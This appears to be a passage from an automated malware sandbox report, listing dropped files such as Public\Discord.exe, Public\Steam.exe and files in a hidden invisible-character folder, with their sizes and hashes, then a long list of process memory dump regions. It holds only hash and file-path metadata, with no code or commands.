15c5d8874b9012ee60222f7c28e3a7331a308144

SHA256
0a96cba0e220df4b82c8ca24d4a170f9659b52d3ef18ee6ed9663d4047c564f7

SHA512
b21f1d74bb60f518cdc5e98471a4cac319fcae54219992539420c668e16b36f90188b0b3479de3b54866b0ae13f4738f2518ed78b3e3811e4cd04ff577a4b5da

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsqC3A6.tmp\inetc.dll

Filesize
21KB

MD5
d7a3fa6a6c738b4a3c40d5602af20b08

SHA1
34fc75d97f640609cb6cadb001da2cb2c0b3538a

SHA256
67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e

SHA512
75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Download Submit
C:\Users\Admin\AppData\Local\Temp\temp_12165.exe

Filesize
175KB

MD5
4012677beb7687bb28d288c705dafcf5

SHA1
e5cd316601fd300dc5eb4a8b20d95e9aa01f0990

SHA256
c2324c432024bda1368e2e54207a022ee0632db39d8c9efa712fd9dad5e8fe07

SHA512
be21c8ca58ec5421ebe353eea424877d3fe46e13b6dfad14d8f2ac76ccbe14f62c681578a8a9896b39416cc9d82e7757a5b1c93d8b0004485aaf8a785eed5ab7

Download Submit
C:\Users\Admin\AppData\Local\Temp\tftp.exe

Filesize
95KB

MD5
461ed9a62b59cf0436ab6cee3c60fe85

SHA1
3f41a2796cc993a1d2196d1973f2cd1990a8c505

SHA256
40fe74d3a1116ed8ca64c62feb694327a414059eeaef62c28bc5917e2e991b3d

SHA512
5f6f7528a05175cc1b8d927feaba56a90c70e8fe42c7ea01999cf328d28b8596de0df8d6d3fbc6e4fe5d89e36982871a59493dcb8d633fb942a35a217e4aedef

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBE69.tmp

Filesize
1KB

MD5
bec858db955fd4359bd326b11bbe8dec

SHA1
ca3f8f86e76b542a692c05e1610d137e6941ed60

SHA256
2d47fbfe6631e1525ed6bb82fbc6417e13519604215749cb58af529bfa665345

SHA512
e9df976b90a11e28cf64dd6aa4c4ba209513e65a7d91aeacf48726f0046ca2b69846931c22395596f643226d79bba7df2343eea21f7100e4f022f7cf30d21d23

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpBEB8.tmp

Filesize
1KB

MD5
32e4166428ba211917e2e78b94efe76a

SHA1
2a6954b85c9ad5fe2cf2a2b9180633c2ed9d5a07

SHA256
9779a221d78366901f8b109e0018e9197a40bea80618c935585a30980d9e9148

SHA512
e1027d5f3ab61f906e815964536a444f57f1dda7762801025caec9ea6556f4df0654d83a324265df4f09e65d3b324daf47979b4dd9d08b84389f5690d7ff0cdd

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‏ \Common Files\Desktop\CompressImport.jpg

Filesize
399KB

MD5
431ee0a4b0298ef78a66a94648c54bab

SHA1
0c49a5cc98167b02932acb7d8202753c37c9d64b

SHA256
3f9c20fd87d619be04c7130b17e14d85266feb133bbcf1b88d804fc7a3f09b26

SHA512
69be696de7d85a664d519c86eb79c4ac938ab4bde8a56f9837f52d482ce1ba313c90134e8e4f99c8541e0848e3f0e2dacbecf94d64e38397bb970a3c566b50f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‏ \Common Files\Documents\DebugExit.txt

Filesize
1.0MB

MD5
a5f2d738194cf8b3ba6d1e4c32f5fc45

SHA1
6a9952bae5b7f93b6c2f299dc54d193a77f8dd06

SHA256
77d115968924a01d3ae756e7cf17c595d0d5364249240da04281d0503c4f2428

SHA512
d0f6ee9e9fa921abf4817e0e5385f8a90457bd4f0d5629ea19fe7f7c5ab94a513b2c82fc8a703372e83b6f20bcd3d7dbeb29150829d9c504a8e89beebf1c9445

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‏ \Common Files\Documents\MergeUnblock.txt

Filesize
613KB

MD5
20491d3a4045452e9ae3de9301449a57

SHA1
ff73c88a9606829b07f9df4b13ee424238466d1e

SHA256
582bfc02fab19ead8b34a7bf03e80243004021c3d33cd912ef3b504980915232

SHA512
1d013a73123f0b99294cde744b868ae363b6552b0607f944649b560a1105374d51dcc2a8c6aa9ebe271795763ef76b3762a39418d3e9c3f15888f9661b1ddb44

Download Submit
C:\Users\Admin\AppData\Local\Temp\‍   ‏ \Common Files\Pictures\My Wallpaper.jpg

Filesize
24KB

MD5
a51464e41d75b2aa2b00ca31ea2ce7eb

SHA1
5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

SHA256
16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

SHA512
b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\Transcoded_000

Filesize
79KB

MD5
9d4be1d4988ebf12030bfc1d177eecd9

SHA1
e560b3cc1fe63e460a5a7b3c5f797ccb9c7b0342

SHA256
02ba64c55bf54752782985333d6fcbbf9b60b7beb603248b95eb511ad9c23ba5

SHA512
bb5fad67f5722a7473a9681c93580ec1111ed915f834090340bd5c109150b01d5cb7e1a48d9ce135bbd58496250c434eb325935c1feee4b96ac84267f89d1d70

Download Submit
C:\Users\Public\Discord.exe

Filesize
340KB

MD5
93a84f8e3c8e40aa764215d360a89064

SHA1
5bf84da9f34ec2fd38bc175a8a890244409edca1

SHA256
18ebb82690ab22e2b00016bbd44df0ab1bd522d7231abe23e11cb56d33bbbe3f

SHA512
da313755609442286062a9be8754399c606c0071812ad7dfb9289d37e9b24ee8cc8688e6563f192dff9552355f917f25ee2ffe735a5e1fc876cfe4ce778cce34

Download Submit
C:\Users\Public\Steam.exe

Filesize
385KB

MD5
d5e9ca906c2366c7878fe7ff36587f6a

SHA1
be89988a517effb21f2e3a0c680f890708d95410

SHA256
25c49795584b8bd3dc5dc2be6e26cecf9dd0cef2323aa71089c1de01ac81dacc

SHA512
ec864f1fa9b7efac08baf3c1feb6626fa4832f76336921ec133aed1d4cfbe9fe8a05a70c0997e831383894d51d05bd4a8335d03353310808fd301bf112cf00ae

Download Submit
memory/440-6431-0x00007FFFD6EB0000-0x00007FFFD6EE3000-memory.dmp

Filesize
204KB

Download
memory/440-6424-0x00007FFFD7320000-0x00007FFFD7339000-memory.dmp

Filesize
100KB

Download
memory/440-6416-0x00007FFFBB930000-0x00007FFFBBF95000-memory.dmp

Filesize
6.4MB

Download
memory/440-6417-0x00007FFFD6F70000-0x00007FFFD6F97000-memory.dmp

Filesize
156KB

Download
memory/440-6423-0x00007FFFD6F40000-0x00007FFFD6F6B000-memory.dmp

Filesize
172KB

Download
memory/440-6426-0x00007FFFC05B0000-0x00007FFFC072F000-memory.dmp

Filesize
1.5MB

Download
memory/440-6425-0x00007FFFD6F10000-0x00007FFFD6F35000-memory.dmp

Filesize
148KB

Download
memory/440-6435-0x00007FFFD6E90000-0x00007FFFD6EA4000-memory.dmp

Filesize
80KB

Download
memory/440-6430-0x00007FFFD6EF0000-0x00007FFFD6F09000-memory.dmp

Filesize
100KB

Download
memory/440-6434-0x00007FFFDF780000-0x00007FFFDF78D000-memory.dmp

Filesize
52KB

Download
memory/440-6433-0x00007FFFC5B80000-0x00007FFFC5C4E000-memory.dmp

Filesize
824KB

Download
memory/440-6432-0x00007FFFBB3F0000-0x00007FFFBB923000-memory.dmp

Filesize
5.2MB

Download
memory/440-6418-0x00007FFFE0E90000-0x00007FFFE0E9F000-memory.dmp

Filesize
60KB

Download
memory/440-6436-0x00007FFFDB360000-0x00007FFFDB36D000-memory.dmp

Filesize
52KB

Download
memory/1856-2304-0x0000000000340000-0x000000000039C000-memory.dmp

Filesize
368KB

Download
memory/1868-6278-0x0000000070290000-0x00000000702DC000-memory.dmp

Filesize
304KB

Download
memory/2260-2116-0x00000000004A0000-0x00000000004AC000-memory.dmp

Filesize
48KB

Download
memory/2260-2397-0x000000001B0D0000-0x000000001B0DA000-memory.dmp

Filesize
40KB

Download
memory/2260-2398-0x000000001B420000-0x000000001B432000-memory.dmp

Filesize
72KB

Download
memory/2260-2127-0x0000000002700000-0x0000000002722000-memory.dmp

Filesize
136KB

Download
memory/3180-2263-0x00007FF653370000-0x00007FF653405000-memory.dmp

Filesize
596KB

Download
memory/3180-2257-0x00007FF653370000-0x00007FF653405000-memory.dmp

Filesize
596KB

Download
memory/3524-0-0x00007FFFC4FE3000-0x00007FFFC4FE5000-memory.dmp

Filesize
8KB

Download
memory/3524-2131-0x00007FFFC4FE0000-0x00007FFFC5AA2000-memory.dmp

Filesize
10.8MB

Download
memory/3524-1-0x0000000000200000-0x0000000000208000-memory.dmp

Filesize
32KB

Download
memory/3524-2-0x00007FFFC4FE0000-0x00007FFFC5AA2000-memory.dmp

Filesize
10.8MB

Download
memory/3524-1960-0x00007FFFC4FE3000-0x00007FFFC4FE5000-memory.dmp

Filesize
8KB

Download
memory/3704-2670-0x00000000007F0000-0x0000000000850000-memory.dmp

Filesize
384KB

Download
memory/3704-2673-0x0000000005020000-0x00000000050B8000-memory.dmp

Filesize
608KB

Download
memory/3704-4765-0x00000000050C0000-0x00000000050EC000-memory.dmp

Filesize
176KB

Download
memory/3720-5260-0x0000000000400000-0x0000000000A86000-memory.dmp

Filesize
6.5MB

Download
memory/3720-2207-0x0000000000400000-0x0000000000A86000-memory.dmp

Filesize
6.5MB

Download
memory/3772-57-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-2129-0x00000000051B0000-0x0000000005216000-memory.dmp

Filesize
408KB

Download
memory/3772-51-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-47-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-45-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-43-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-41-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-40-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-63-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-37-0x00000000003F0000-0x0000000000450000-memory.dmp

Filesize
384KB

Download
memory/3772-39-0x0000000004EB0000-0x0000000004F48000-memory.dmp

Filesize
608KB

Download
memory/3772-79-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-2117-0x0000000004E50000-0x0000000004E7C000-memory.dmp

Filesize
176KB

Download
memory/3772-93-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-91-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-89-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-75-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-85-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-83-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-2126-0x0000000005020000-0x000000000506C000-memory.dmp

Filesize
304KB

Download
memory/3772-81-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-77-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-73-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-49-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-87-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-71-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-69-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-2130-0x0000000005930000-0x0000000005ED6000-memory.dmp

Filesize
5.6MB

Download
memory/3772-67-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-65-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-61-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-59-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-53-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-55-0x0000000004EB0000-0x0000000004F42000-memory.dmp

Filesize
584KB

Download
memory/3772-2128-0x0000000005110000-0x00000000051A2000-memory.dmp

Filesize
584KB

Download
memory/3960-26-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-24-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-32-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-33-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-34-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-35-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-36-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-31-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-25-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/3960-30-0x000001FE797B0000-0x000001FE797B1000-memory.dmp

Filesize
4KB

Download
memory/4280-2302-0x0000020028DF0000-0x0000020028E56000-memory.dmp

Filesize
408KB

Download
memory/4732-5746-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4732-4970-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4732-6186-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/4776-5173-0x0000000000D30000-0x0000000000D42000-memory.dmp

Filesize
72KB

Download
memory/4884-2279-0x0000000000B70000-0x0000000000C72000-memory.dmp

Filesize
1.0MB

Download
memory/5228-2516-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5228-2505-0x0000000000400000-0x000000000042F000-memory.dmp

Filesize
188KB

Download
memory/5288-2509-0x0000000000400000-0x000000000042E000-memory.dmp

Filesize
184KB

Download
memory/5292-2568-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/5292-2565-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/5364-6170-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/5364-5060-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/5364-5761-0x0000000000400000-0x0000000000422000-memory.dmp

Filesize
136KB

Download
memory/5692-2228-0x0000000000400000-0x000000000085E000-memory.dmp

Filesize
4.4MB

Download
memory/5692-5206-0x0000000000400000-0x000000000085E000-memory.dmp

Filesize
4.4MB

Download
memory/5692-2150-0x0000000000400000-0x000000000085E000-memory.dmp

Filesize
4.4MB

Download
memory/5704-5110-0x0000000000220000-0x0000000000236000-memory.dmp

Filesize
88KB

Download
memory/5704-5189-0x0000000005080000-0x000000000508A000-memory.dmp

Filesize
40KB

Download
memory/5844-2141-0x00000000006D0000-0x0000000000B90000-memory.dmp

Filesize
4.8MB

Download
memory/5844-2224-0x00000000006D0000-0x0000000000B90000-memory.dmp

Filesize
4.8MB

Download
memory/6060-2623-0x0000000000810000-0x0000000000834000-memory.dmp

Filesize
144KB

Download
memory/6120-6244-0x0000000005E90000-0x0000000005EAE000-memory.dmp

Filesize
120KB

Download
memory/6120-6232-0x0000000005200000-0x000000000582A000-memory.dmp

Filesize
6.2MB

Download
memory/6120-6263-0x00000000073F0000-0x0000000007401000-memory.dmp

Filesize
68KB

Download
memory/6120-6264-0x0000000007420000-0x000000000742E000-memory.dmp

Filesize
56KB

Download
memory/6120-6265-0x0000000007430000-0x0000000007445000-memory.dmp

Filesize
84KB

Download
memory/6120-6266-0x0000000007540000-0x000000000755A000-memory.dmp

Filesize
104KB

Download
memory/6120-6267-0x0000000007520000-0x0000000007528000-memory.dmp

Filesize
32KB

Download
memory/6120-6231-0x0000000002680000-0x00000000026B6000-memory.dmp

Filesize
216KB

Download
memory/6120-6262-0x0000000007480000-0x0000000007516000-memory.dmp

Filesize
600KB

Download
memory/6120-6234-0x00000000058D0000-0x0000000005936000-memory.dmp

Filesize
408KB

Download
memory/6120-6261-0x0000000007250000-0x000000000725A000-memory.dmp

Filesize
40KB

Download
memory/6120-6260-0x00000000071E0000-0x00000000071FA000-memory.dmp

Filesize
104KB

Download
memory/6120-6233-0x0000000005830000-0x0000000005852000-memory.dmp

Filesize
136KB

Download
memory/6120-6259-0x0000000007820000-0x0000000007E9A000-memory.dmp

Filesize
6.5MB

Download
memory/6120-6258-0x00000000070B0000-0x0000000007154000-memory.dmp

Filesize
656KB

Download
memory/6120-6243-0x00000000059B0000-0x0000000005D07000-memory.dmp

Filesize
3.3MB

Download
memory/6120-6257-0x0000000006470000-0x000000000648E000-memory.dmp

Filesize
120KB

Download
memory/6120-6248-0x0000000070290000-0x00000000702DC000-memory.dmp

Filesize
304KB

Download
memory/6120-6247-0x0000000007070000-0x00000000070A4000-memory.dmp

Filesize
208KB

Download
memory/6284-4803-0x0000000000DB0000-0x0000000000DD0000-memory.dmp

Filesize
128KB

Download
memory/6292-5325-0x0000000007DF0000-0x0000000007E2C000-memory.dmp

Filesize
240KB

Download
memory/6292-5330-0x0000000007F90000-0x0000000007FDC000-memory.dmp

Filesize
304KB

Download
memory/6292-5323-0x0000000007E80000-0x0000000007F8A000-memory.dmp

Filesize
1.0MB

Download
memory/6292-5324-0x0000000007D90000-0x0000000007DA2000-memory.dmp

Filesize
72KB

Download
memory/6292-5304-0x0000000000720000-0x0000000000772000-memory.dmp

Filesize
328KB

Download
memory/6292-5322-0x00000000064B0000-0x0000000006AC8000-memory.dmp

Filesize
6.1MB

Download
memory/6940-6204-0x0000000000FA0000-0x0000000000FB0000-memory.dmp

Filesize
64KB

Download
memory/7220-3719-0x0000000000FB0000-0x0000000000FC0000-memory.dmp

Filesize
64KB

Download
memory/7272-5044-0x0000000000B30000-0x0000000000E54000-memory.dmp

Filesize
3.1MB

Download
memory/7344-5006-0x00007FF6B9A90000-0x00007FF6B9B25000-memory.dmp

Filesize
596KB

Download
memory/7356-5188-0x0000000000380000-0x0000000000392000-memory.dmp

Filesize
72KB

Download
memory/7740-4870-0x0000000000570000-0x00000000005AC000-memory.dmp

Filesize
240KB

Download
memory/8048-5268-0x0000000006A70000-0x0000000006A88000-memory.dmp

Filesize
96KB

Download
memory/8048-5126-0x00000000054A0000-0x000000000553C000-memory.dmp

Filesize
624KB

Download
memory/8048-5125-0x0000000000B70000-0x0000000000B82000-memory.dmp

Filesize
72KB

Download